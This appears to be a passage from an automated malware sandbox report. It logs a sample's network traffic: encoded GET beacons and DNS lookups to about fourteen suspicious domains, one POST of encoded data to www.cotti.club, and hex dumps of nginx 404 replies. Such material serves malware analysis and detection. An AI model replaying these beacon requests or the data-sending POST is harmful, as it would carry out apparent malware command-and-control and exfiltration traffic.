                Source: global trafficHTTP traffic detected: GET /nhtq/?ZT=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.iampinky.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /3ej6/?ZT=Gf4n60vPMxeL0A+d5GBWdueSYaV7AAF6sYlT7O2otcMNGwtil4ITBlU9iT/EVO+vtwlhWFB1C/mfTw8URcWhMQgTObTwj1m/ib0JAzzbicsZX3cTLGstzzo=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.cotti.clubConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /diem/?mTkD=Gj2Ti2T0g4&ZT=6kQoSQEqBTKFeIgPWItcwMtJ6+nSmUORx6o6L7StlLAM0wJa+kMHFj5rDbCqKJO5phAeVuacSteB2VMr/yCaTx+wFCn7HbSrd9uZdvfw4QtNwXqKd1ZsMRg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.solarand.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /2sun/?ZT=HFv57CWzV4D1L9ubGrUw/N+LZZ6BniYLjcS4cRbGENzhA3BKZjtgqnC6wzdpxcsL4M445YXmdmOqKzt/9+uXSXCfKbs+tX0lmfcjUf3N9oWc/wvfMeYS2jQ=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.030002059.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /akxn/?ZT=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.xipowerplay.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /wd23/?ZT=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.stationseek.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /jwed/?ZT=BP+RnxL4kRmCbJis2H94uci3abF0xOX/uWRdW7IS0nQn3eBqrLGhokpRAgB0njlljCrnZN3jlOJi4UAaeIXlep/T+OgRPR3ifAipJWCHkORcjZ0KtUFfU2c=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.091210.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /wr26/?ZT=8UnATjvfTpQ77jvixFCgWVUX2yh4jGZbjC17bXoElnpRCxInjgnE/2IqsqXHODoNl6OiDfBQBXM7D7XvNANc8/XGVjRwEyGKTULZaqlRQkXooaUfX5GSz0A=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.adsa6c.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /ep69/?ZT=1FIMhSJhU8+lHAAmrS+FlWYlLXz7aIiZYVZCfaZw4D7e7Ym+VFULEmTMy/HAB+T+rsRxHszMTzww+hC5XQWyLoZ+L/5l/vKoQeg/i8EmIWt3MnVCcXzM6O0=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.simplek.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /xyex/?ZT=GRv8gXQeeb2Gl8ts68dy26JEIDOFTPQDU1Y3CPEivIL54q3aRuVfXNser16Tn8T/OBl4IICKxXKXWQiZ2Uzn7HwRtVNzQ2FbKXtno3vR39Y/zqEhWKkV0ww=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.297676.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /dma3/?mTkD=Gj2Ti2T0g4&ZT=IhPPRAmDChEnx8G5Mk3wYKJVvliqClSy7lT3/i9hniKwN2WP3nmtzIAyaYX2MoR3jQRU/NaT7iTCvd3O/fPSuEFMVnQWNGAOAVxjgpJaGw2AUh+P10Czoew= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.cesach.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /3xn5/?ZT=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.basicreviews.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /33ib/?ZT=AYOfApeu9cghctp2i/KTSy5LkW4tz9x7+arej5d+r0NkQieZykYOddwLhoh5ni50J8Z5WiAS8Adn1ZwJ2laV/jmSd394ohUQohZCg1IJ+kicD56x/bghldI=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.sgland06.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /jr4j/?ZT=/uHXlXwxCWKagG2f+cMqJk/ouEnshdx+b5P4XSvx6MlJZzR/8pbZgxPfuPQh+b7XVC9rmLmVxzweaBtr7+wSxihG8Hktp9qijzhrRRKR+f0leSIT4/3X8Bo=&mTkD=Gj2Ti2T0g4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.extrime1.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="S equals www.facebook.com (Facebook)
                Source: global trafficDNS traffic detected: DNS query: www.iampinky.info
                Source: global trafficDNS traffic detected: DNS query: www.cotti.club
                Source: global trafficDNS traffic detected: DNS query: www.solarand.online
                Source: global trafficDNS traffic detected: DNS query: www.030002059.xyz
                Source: global trafficDNS traffic detected: DNS query: www.xipowerplay.xyz
                Source: global trafficDNS traffic detected: DNS query: www.stationseek.online
                Source: global trafficDNS traffic detected: DNS query: www.091210.xyz
                Source: global trafficDNS traffic detected: DNS query: www.adsa6c.top
                Source: global trafficDNS traffic detected: DNS query: www.simplek.top
                Source: global trafficDNS traffic detected: DNS query: www.297676.com
                Source: global trafficDNS traffic detected: DNS query: www.cesach.net
                Source: global trafficDNS traffic detected: DNS query: www.basicreviews.online
                Source: global trafficDNS traffic detected: DNS query: www.sgland06.online
                Source: global trafficDNS traffic detected: DNS query: www.extrime1.shop
                Source: unknownHTTP traffic detected: POST /3ej6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Host: www.cotti.clubCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 199Connection: closeOrigin: http://www.cotti.clubReferer: http://www.cotti.club/3ej6/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like GeckoData Raw: 5a 54 3d 4c 64 51 48 35 43 50 32 46 6c 65 53 30 51 58 34 77 58 4e 37 55 65 4b 5a 52 4a 6b 49 41 69 56 75 78 71 64 71 6c 66 57 42 76 66 49 78 41 41 39 41 79 70 45 53 4d 68 77 58 72 57 44 36 64 35 6d 67 6f 79 70 4f 62 33 6b 62 47 5a 75 54 55 47 35 4d 4d 37 43 74 42 68 42 47 49 49 2b 6b 68 30 57 4b 2b 62 78 63 41 30 4c 44 72 2f 68 70 43 42 49 59 41 56 41 73 74 41 68 38 47 66 67 4e 63 78 45 56 7a 44 74 64 39 61 45 72 39 39 61 38 31 68 44 53 74 79 74 5a 31 67 38 7a 35 44 55 5a 6e 77 34 41 6f 32 51 76 50 39 72 4c 4a 58 71 6b 32 64 6f 7a 51 4c 67 67 41 57 49 53 36 34 36 73 78 6c 4c 2f 53 77 3d 3d Data Ascii: ZT=LdQH5CP2FleS0QX4wXN7UeKZRJkIAiVuxqdqlfWBvfIxAA9AypESMhwXrWD6d5mgoypOb3kbGZuTUG5MM7CtBhBGII+kh0WK+bxcA0LDr/hpCBIYAVAstAh8GfgNcxEVzDtd9aEr99a81hDStytZ1g8z5DUZnw4Ao2QvP9rLJXqk2dozQLggAWIS646sxlL/Sw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:11:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:11:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:11:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:11:25 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 